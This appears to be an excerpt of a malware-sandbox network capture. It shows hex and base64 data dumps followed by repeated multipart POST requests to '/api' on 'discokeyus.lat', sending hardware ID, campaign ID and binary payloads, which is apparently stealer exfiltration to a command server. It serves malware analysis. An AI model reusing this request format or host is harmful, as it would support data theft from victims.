                                                                                                                                                                                                                                                                          Data Ascii: +lPi8tF7AWaKMG5jZfS7GuGCZEkJGd4iWJKQaxcHKB7+T8vPsHZtjpZcFgttjIoGvJ4ddQkIx39Vs5lTH2oVY/rPw/+8KnnrhgkSUlGokxv9uhlxERzfC3iejEdLJzA2zk+324x2TbKuXBYfQYCWApy7AHAVNL5CObIsR0MXJFvypoOOiB9Nsrd1SzdxoK4WsIYNaTlg3wtAhrQbGx8sKvYHq8uodmmComA2JlCNogb9u2BJkRzzc3DuoVN+M3E
                                                                                                                                                                                                                                                                          2024-12-21 00:16:45 UTC1369INData Raw: 34 34 61 65 0d 0a 66 71 72 41 48 64 63 75 47 61 42 73 32 4d 4c 53 65 4a 71 43 61 41 55 30 46 48 4d 39 48 62 49 4b 45 58 7a 4d 37 4e 44 62 4b 58 37 2f 54 6b 48 5a 74 35 72 35 4d 4d 69 39 52 6f 61 4d 6a 6e 4b 5a 67 53 48 51 6f 54 33 73 45 34 6f 31 62 31 77 63 73 4f 75 59 57 67 34 36 49 48 30 32 79 74 33 56 4c 4e 32 6d 41 6a 69 71 41 6e 67 56 46 46 51 44 6e 66 33 43 53 67 46 4d 33 44 7a 67 69 34 6e 75 76 7a 34 78 6d 62 61 4b 32 59 42 34 36 55 49 32 69 42 76 32 37 59 45 6d 42 45 4e 4d 48 48 62 70 30 58 7a 73 7a 43 46 76 36 4d 72 75 57 73 47 5a 38 72 2b 64 30 41 69 74 4e 70 4a 59 79 6b 4b 6f 52 66 53 6b 4d 2b 32 63 51 6d 70 42 72 53 7a 38 38 46 73 4a 2f 6c 38 2b 77 66 6b 6d 57 72 6c 6b 72 44 6c 47 6f 77 78 76 39 75 72 31 39 56 57 44 33 62 78 32 36 64 46 38 37
                                                                                                                                                                                                                                                                          Data Ascii: 44aefqrAHdcuGaBs2MLSeJqCaAU0FHM9HbIKEXzM7NDbKX7/TkHZt5r5MMi9RoaMjnKZgSHQoT3sE4o1b1wcsOuYWg46IH02yt3VLN2mAjiqAngVFFQDnf3CSgFM3Dzgi4nuvz4xmbaK2YB46UI2iBv27YEmBENMHHbp0XzszCFv6MruWsGZ8r+d0AitNpJYykKoRfSkM+2cQmpBrSz88FsJ/l8+wfkmWrlkrDlGowxv9ur19VWD3bx26dF87
                                                                                                                                                                                                                                                                          2024-12-21 00:16:45 UTC1369INData Raw: 72 7a 6a 36 75 5a 65 6a 43 57 34 33 51 32 42 6c 44 56 6f 6a 4b 73 71 67 31 35 4d 52 6a 72 52 30 69 75 6c 45 4d 44 45 77 77 57 2f 6d 4f 6a 77 34 78 53 66 62 36 32 55 44 49 48 58 62 69 37 47 36 57 36 48 53 67 55 53 64 2f 48 62 4a 36 51 55 77 39 50 43 51 50 44 54 37 76 72 73 58 73 74 39 73 59 6f 4e 6b 70 70 30 61 49 47 72 62 74 67 53 54 31 67 79 33 74 49 6d 72 52 44 4d 79 4d 55 46 72 4a 76 6d 2b 2b 41 57 6c 6d 53 6e 6d 41 65 4b 33 32 34 36 6c 4b 51 71 6a 6c 34 46 42 48 66 58 7a 6d 7a 77 56 4f 58 56 78 68 43 34 6b 4b 44 6a 6f 67 66 54 62 4b 33 64 55 73 33 55 59 79 53 4e 6f 43 57 4c 56 6b 46 4b 4f 74 76 59 49 71 45 59 79 4d 37 43 45 72 4f 57 36 50 62 6c 47 35 39 6d 6f 6f 38 4a 6a 4a 51 6a 61 49 47 2f 62 74 67 53 59 6e 6b 41 38 35 59 7a 35 67 32 41 78 63 6c 41
                                                                                                                                                                                                                                                                          Data Ascii: rzj6uZejCW43Q2BlDVojKsqg15MRjrR0iulEMDEwwW/mOjw4xSfb62UDIHXbi7G6W6HSgUSd/HbJ6QUw9PCQPDT7vrsXst9sYoNkpp0aIGrbtgST1gy3tImrRDMyMUFrJvm++AWlmSnmAeK3246lKQqjl4FBHfXzmzwVOXVxhC4kKDjogfTbK3dUs3UYySNoCWLVkFKOtvYIqEYyM7CErOW6PblG59moo8JjJQjaIG/btgSYnkA85Yz5g2AxclA
                                                                                                                                                                                                                                                                          2024-12-21 00:16:45 UTC1369INData Raw: 2f 6a 46 64 4e 30 37 34 52 4b 69 74 67 74 63 4d 61 67 4a 6f 68 63 52 6b 77 38 33 4e 6f 74 6f 52 4c 46 79 73 49 50 75 5a 72 6e 2f 4f 6f 4d 6c 47 61 6f 6e 51 47 45 33 6d 6b 70 6a 65 64 67 77 46 56 64 43 6d 2b 51 35 43 75 2b 42 4d 4f 43 32 6b 36 6e 30 2b 66 77 72 45 62 54 5a 72 4f 63 44 35 2f 51 59 69 4f 55 72 43 69 41 56 31 64 4e 4f 39 72 5a 4c 36 41 5a 77 38 72 58 41 4c 4f 54 38 75 37 71 46 5a 30 72 37 39 30 4e 6c 5a 51 31 61 4c 65 77 4a 63 42 4e 43 31 4e 33 31 39 70 73 38 46 54 44 79 4d 67 4f 72 4a 66 6d 39 2b 38 51 6d 32 36 70 6d 51 43 41 32 32 59 69 6a 36 38 75 6a 31 64 4e 51 54 48 65 31 79 71 6b 47 59 43 4d 68 51 65 6d 30 37 69 38 79 77 53 65 62 62 61 4d 50 34 72 55 50 47 69 5a 36 54 66 41 56 55 6b 4b 62 35 44 62 49 4b 49 5a 78 63 62 4e 42 37 32 53 37
                                                                                                                                                                                                                                                                          Data Ascii: /jFdN074RKitgtcMagJohcRkw83NotoRLFysIPuZrn/OoMlGaonQGE3mkpjedgwFVdCm+Q5Cu+BMOC2k6n0+fwrEbTZrOcD5/QYiOUrCiAV1dNO9rZL6AZw8rXALOT8u7qFZ0r790NlZQ1aLewJcBNC1N319ps8FTDyMgOrJfm9+8Qm26pmQCA22Yij68uj1dNQTHe1yqkGYCMhQem07i8ywSebbaMP4rUPGiZ6TfAVUkKb5DbIKIZxcbNB72S7
                                                                                                                                                                                                                                                                          2024-12-21 00:16:45 UTC1369INData Raw: 66 4b 2f 6e 64 42 49 44 53 62 43 6d 4f 72 79 36 47 57 45 46 4a 50 74 50 52 4a 61 34 66 77 38 6a 4b 42 37 69 58 34 50 66 72 45 4a 56 75 71 70 52 4b 77 35 52 71 4d 4d 62 2f 62 71 5a 78 56 31 67 46 33 74 55 33 36 41 75 4f 32 34 55 48 73 74 4f 34 76 4f 63 57 6e 48 6d 6b 6c 41 4b 4a 33 57 30 73 6a 4b 6f 70 67 46 64 49 54 7a 50 65 30 69 75 6f 47 4d 2f 46 7a 51 2b 36 6b 2b 2b 38 6f 6c 36 55 63 2b 48 46 53 71 33 66 65 77 6d 49 72 44 7a 41 54 51 74 54 64 39 66 61 62 50 42 55 7a 73 76 45 43 4c 43 66 36 50 6a 2b 48 70 68 69 72 70 77 46 6a 64 64 73 49 6f 36 31 4b 49 42 5a 54 55 30 2f 31 4e 67 2b 71 52 75 41 6a 49 55 48 70 74 4f 34 76 4e 30 49 6c 47 79 75 33 79 4f 4b 7a 32 77 69 68 61 77 69 77 45 30 4c 55 33 66 58 32 6d 7a 77 56 4d 33 4f 79 41 53 73 6e 2b 44 38 35 52
                                                                                                                                                                                                                                                                          Data Ascii: fK/ndBIDSbCmOry6GWEFJPtPRJa4fw8jKB7iX4PfrEJVuqpRKw5RqMMb/bqZxV1gF3tU36AuO24UHstO4vOcWnHmklAKJ3W0sjKopgFdITzPe0iuoGM/FzQ+6k++8ol6Uc+HFSq3fewmIrDzATQtTd9fabPBUzsvECLCf6Pj+HphirpwFjddsIo61KIBZTU0/1Ng+qRuAjIUHptO4vN0IlGyu3yOKz2wihawiwE0LU3fX2mzwVM3OyASsn+D85R
                                                                                                                                                                                                                                                                          2024-12-21 00:16:45 UTC1369INData Raw: 6b 77 2b 4d 32 47 63 76 69 4c 55 76 69 6c 35 45 54 54 44 62 78 43 65 36 48 38 6a 42 79 77 69 33 6b 2b 37 38 37 52 4f 54 4b 2b 2f 64 44 5a 57 55 4e 57 69 6a 68 44 6d 57 57 41 64 70 49 4d 62 63 4b 36 51 43 79 38 50 47 46 72 4f 44 6f 4c 4b 73 44 35 52 36 34 63 55 63 6e 63 4e 71 4e 38 69 2b 62 6f 64 65 42 52 4a 33 32 39 6b 69 70 52 2f 45 79 38 41 49 76 5a 62 6c 39 75 41 53 6b 6d 4f 6f 6c 77 2b 49 30 6d 63 72 69 4b 67 76 6a 46 5a 4d 52 44 36 51 6d 47 79 76 44 49 43 61 68 54 61 75 6c 50 6a 78 2f 46 79 68 61 4c 43 4d 48 34 44 45 61 32 71 70 70 43 4b 44 56 30 4a 61 64 38 2b 59 4e 65 67 54 7a 49 4b 64 51 4c 36 58 37 50 2f 72 45 4a 78 6d 72 70 6f 42 67 74 35 6a 4f 6f 6d 69 4a 6f 78 61 53 46 67 39 32 73 51 6c 6f 52 6e 4f 79 74 63 44 2f 74 32 67 2b 2f 52 65 79 79 75
                                                                                                                                                                                                                                                                          Data Ascii: kw+M2GcviLUvil5ETTDbxCe6H8jBywi3k+787ROTK+/dDZWUNWijhDmWWAdpIMbcK6QCy8PGFrODoLKsD5R64cUcncNqN8i+bodeBRJ329kipR/Ey8AIvZbl9uASkmOolw+I0mcriKgvjFZMRD6QmGyvDICahTaulPjx/FyhaLCMH4DEa2qppCKDV0Jad8+YNegTzIKdQL6X7P/rEJxmrpoBgt5jOomiJoxaSFg92sQloRnOytcD/t2g+/Reyyu
                                                                                                                                                                                                                                                                          2024-12-21 00:16:45 UTC1369INData Raw: 4d 4a 67 4f 49 57 69 4b 62 35 73 53 30 30 6a 31 39 67 71 71 46 53 4f 67 73 70 41 35 71 71 67 74 4b 77 68 33 53 75 35 33 56 4c 4e 34 57 34 6d 69 4b 41 34 6b 52 39 6d 58 53 48 61 7a 57 36 4f 45 39 48 4c 30 77 32 73 30 36 36 38 36 6c 37 4c 4f 2b 2f 64 44 70 79 55 4e 58 6a 55 2f 48 76 54 42 52 55 59 4b 4a 37 50 62 4c 35 55 6d 4a 43 4c 51 4b 7a 54 75 4c 79 72 48 59 46 35 70 35 34 63 6a 70 4e 54 46 71 61 73 4f 49 46 66 54 6b 59 4a 37 73 4d 76 70 68 72 48 31 4e 52 41 38 4e 50 76 76 4c 51 6e 30 79 50 68 6f 6b 54 4e 7a 43 31 77 78 70 49 74 6a 6c 78 43 58 43 61 64 39 69 65 2b 46 63 33 4a 79 55 4b 2f 6e 76 44 37 72 46 44 54 62 65 48 46 57 73 4f 55 61 54 6e 47 2f 33 37 53 43 52 41 5a 59 49 43 45 4d 2b 59 4e 67 4e 53 46 57 4f 7a 64 6f 4f 36 73 52 74 4d 73 6f 6f 38 59
                                                                                                                                                                                                                                                                          Data Ascii: MJgOIWiKb5sS00j19gqqFSOgspA5qqgtKwh3Su53VLN4W4miKA4kR9mXSHazW6OE9HL0w2s06686l7LO+/dDpyUNXjU/HvTBRUYKJ7PbL5UmJCLQKzTuLyrHYF5p54cjpNTFqasOIFfTkYJ7sMvphrH1NRA8NPvvLQn0yPhokTNzC1wxpItjlxCXCad9ie+Fc3JyUK/nvD7rFDTbeHFWsOUaTnG/37SCRAZYICEM+YNgNSFWOzdoO6sRtMsoo8Y
                                                                                                                                                                                                                                                                          2024-12-21 00:16:45 UTC1369INData Raw: 75 47 72 47 37 4f 45 6b 4d 4b 62 34 4b 59 62 4b 77 46 67 4a 71 56 55 75 58 47 73 36 75 38 54 49 77 6c 75 4e 30 63 7a 59 77 2f 5a 73 61 31 62 74 67 53 41 6b 6b 6c 77 74 41 76 76 68 65 48 2f 50 73 6d 76 5a 54 6d 2f 2b 49 4a 67 69 6d 4f 6e 67 47 42 32 47 6f 2b 75 4a 6b 37 67 31 78 4c 54 53 48 42 6c 6d 4c 6f 47 34 43 61 2f 45 43 76 6d 65 65 77 70 46 4b 43 65 4b 2b 57 48 49 71 55 55 6d 62 47 76 32 37 59 45 6e 42 4a 4f 64 37 52 4f 72 6c 5a 35 73 48 43 42 72 32 64 39 2b 32 73 55 4e 4e 74 34 63 56 59 77 35 52 70 4f 63 62 2f 66 74 49 4a 45 42 6c 67 67 49 51 7a 35 67 32 41 31 49 56 59 37 64 32 67 37 71 78 47 30 79 79 76 6b 41 75 4f 32 6d 34 36 6c 4b 45 74 6c 6c 45 43 64 41 6e 31 32 79 47 74 47 73 66 38 2b 79 47 30 67 2b 33 7a 36 79 43 74 58 4c 43 61 47 73 2f 79 62
                                                                                                                                                                                                                                                                          Data Ascii: uGrG7OEkMKb4KYbKwFgJqVUuXGs6u8TIwluN0czYw/Zsa1btgSAkklwtAvvheH/PsmvZTm/+IJgimOngGB2Go+uJk7g1xLTSHBlmLoG4Ca/ECvmeewpFKCeK+WHIqUUmbGv27YEnBJOd7ROrlZ5sHCBr2d9+2sUNNt4cVYw5RpOcb/ftIJEBlggIQz5g2A1IVY7d2g7qxG0yyvkAuO2m46lKEtllECdAn12yGtGsf8+yG0g+3z6yCtXLCaGs/yb


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                          54192.168.2.550278172.67.197.170443
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:16:47 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=3CHJD06363N7AUMNRA3
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          Content-Length: 12841
                                                                                                                                                                                                                                                                          Host: discokeyus.lat
                                                                                                                                                                                                                                                                          2024-12-21 00:16:47 UTC12841OUTData Raw: 2d 2d 33 43 48 4a 44 30 36 33 36 33 4e 37 41 55 4d 4e 52 41 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 45 31 32 30 36 37 32 30 30 45 33 45 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 33 43 48 4a 44 30 36 33 36 33 4e 37 41 55 4d 4e 52 41 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 33 43 48 4a 44 30 36 33 36 33 4e 37 41 55 4d 4e 52 41 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61
                                                                                                                                                                                                                                                                          Data Ascii: --3CHJD06363N7AUMNRA3Content-Disposition: form-data; name="hwid"80E12067200E3E98AC8923850305D13E--3CHJD06363N7AUMNRA3Content-Disposition: form-data; name="pid"2--3CHJD06363N7AUMNRA3Content-Disposition: form-data; name="lid"PsFKDg--pa
                                                                                                                                                                                                                                                                          2024-12-21 00:16:48 UTC1126INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:16:48 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=qmf0dfh63gdq68o8i67jmtjogh; expires=Tue, 15 Apr 2025 18:03:26 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uZ73nrLEJhE0H9Jbi5Z26dVFUi8kLY3QJhZzfnVEpD%2BHMqtg01gCtdm1HSPCejMtjvNUm96XgzzJzuF2vVFjljw8b0rowKlFnlT2VUP%2FtViJR3J4WyPRevp2g812ErHLLA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8f53af798d0ec46d-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1609&min_rtt=1597&rtt_var=624&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2832&recv_bytes=13780&delivery_rate=1718658&cwnd=248&unsent_bytes=0&cid=93bbcf0fd51e2dce&ts=897&x=0"
                                                                                                                                                                                                                                                                          2024-12-21 00:16:48 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                          2024-12-21 00:16:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                          55192.168.2.550279172.67.197.170443
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:16:49 UTC272OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=QA4UGRJSEI
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          Content-Length: 16288
                                                                                                                                                                                                                                                                          Host: discokeyus.lat
                                                                                                                                                                                                                                                                          2024-12-21 00:16:49 UTC15331OUTData Raw: 2d 2d 51 41 34 55 47 52 4a 53 45 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 45 31 32 30 36 37 32 30 30 45 33 45 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 51 41 34 55 47 52 4a 53 45 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 51 41 34 55 47 52 4a 53 45 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 51 41 34 55 47 52 4a 53 45 49 0d 0a 43 6f 6e 74 65 6e 74 2d
                                                                                                                                                                                                                                                                          Data Ascii: --QA4UGRJSEIContent-Disposition: form-data; name="hwid"80E12067200E3E98AC8923850305D13E--QA4UGRJSEIContent-Disposition: form-data; name="pid"2--QA4UGRJSEIContent-Disposition: form-data; name="lid"PsFKDg--pablo--QA4UGRJSEIContent-
                                                                                                                                                                                                                                                                          2024-12-21 00:16:49 UTC957OUTData Raw: 1d bf ee 2a b9 2e 66 74 3d c1 46 5c 2a df 78 64 aa 74 67 79 dc 94 d4 60 2d 5a 20 de 71 ec c0 5c 19 de 73 ae db 38 5b 28 2d 2f 6b 0f f2 43 6b de e2 f0 e1 ed 47 c6 ac 75 8b 43 f5 a5 c3 55 46 aa 4a e0 ed ed 05 76 f8 e9 17 7b ed 39 ae 13 34 14 cb a9 06 f5 a4 9c 5a 15 97 c8 45 59 8f bf d5 d0 8d 9b 67 a6 4a df ba 3a b9 ac 06 eb f6 92 e5 35 d8 7b 56 bc 37 cf f6 de 9f bb 8b 4f 17 4a 97 2e 69 f7 e7 a3 e2 b3 6b f5 de 7b 64 90 f8 78 39 55 68 89 00 fd e8 07 57 d4 da c9 d6 ab 1c 35 b6 83 d9 fd a8 25 96 2f 16 d1 aa 35 ab 1a bd 74 4c 98 78 ee 9e d2 0b a5 cd 65 ad 6b 44 e7 db 7f 61 eb 2d 62 09 12 6f 70 a6 32 c2 a5 d4 8d 30 f1 70 79 73 0c 47 4a bc 14 1b dd d7 2e 46 f5 ee fe cd 54 7f a1 1f 75 78 fb 69 65 ff 40 91 f0 68 ed e9 45 52 bc 0d 2b 17 02 a6 de 02 92 93 fe 4d 91 cb
                                                                                                                                                                                                                                                                          Data Ascii: *.ft=F\*xdtgy`-Z q\s8[(-/kCkGuCUFJv{94ZEYgJ:5{V7OJ.ik{dx9UhW5%/5tLxekDa-bop20pysGJ.FTuxie@hER+M
                                                                                                                                                                                                                                                                          2024-12-21 00:16:50 UTC1135INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:16:50 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=flmmkan4fj04me8ah6s8dfidvp; expires=Tue, 15 Apr 2025 18:03:29 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WrcTE6IGmIeZj%2F4ia348rKZIn2Kk%2FejmAPpAnsuLE7TmSHYzVsqKQ8RVw%2BoYXpLtbl9kQTlwn%2FPq2tbJ3GmpJwv1VUPYqOoEAw0sbg92ey%2F5Db5UAWPMaGuY%2BruEmSXsLg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8f53af86ef368c41-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1833&min_rtt=1817&rtt_var=693&sent=10&recv=20&lost=0&retrans=0&sent_bytes=2833&recv_bytes=17240&delivery_rate=1607044&cwnd=225&unsent_bytes=0&cid=68795a260ab2e3b6&ts=910&x=0"
                                                                                                                                                                                                                                                                          2024-12-21 00:16:50 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                                          2024-12-21 00:16:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                          56192.168.2.550281172.67.197.170443
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-21 00:16:51 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=OBCE95YTAIY33
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          Content-Length: 20537
                                                                                                                                                                                                                                                                          Host: discokeyus.lat
                                                                                                                                                                                                                                                                          2024-12-21 00:16:51 UTC15331OUTData Raw: 2d 2d 4f 42 43 45 39 35 59 54 41 49 59 33 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 30 45 31 32 30 36 37 32 30 30 45 33 45 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4f 42 43 45 39 35 59 54 41 49 59 33 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4f 42 43 45 39 35 59 54 41 49 59 33 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 4f 42 43 45 39 35 59 54 41 49 59
                                                                                                                                                                                                                                                                          Data Ascii: --OBCE95YTAIY33Content-Disposition: form-data; name="hwid"80E12067200E3E98AC8923850305D13E--OBCE95YTAIY33Content-Disposition: form-data; name="pid"3--OBCE95YTAIY33Content-Disposition: form-data; name="lid"PsFKDg--pablo--OBCE95YTAIY
                                                                                                                                                                                                                                                                          2024-12-21 00:16:51 UTC5206OUTData Raw: 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii: Wun 4F([:7s~X`nO`i
                                                                                                                                                                                                                                                                          2024-12-21 00:16:52 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sat, 21 Dec 2024 00:16:52 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=i6o825pbie3eddibbq3qfasvev; expires=Tue, 15 Apr 2025 18:03:31 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4u03cbmUbh4A0n8k%2FZP3MwvsktP8YbB1DUUgPD9AT1ih2fDVy0E4VVrEWtjQEgImqaHTFTPz1O1SOgyh7riwxE1M0tN2rO%2B7U79VvXrBqm8NvE0jXVWIs0TesqyXvDykEA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8f53af947b3e1a48-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
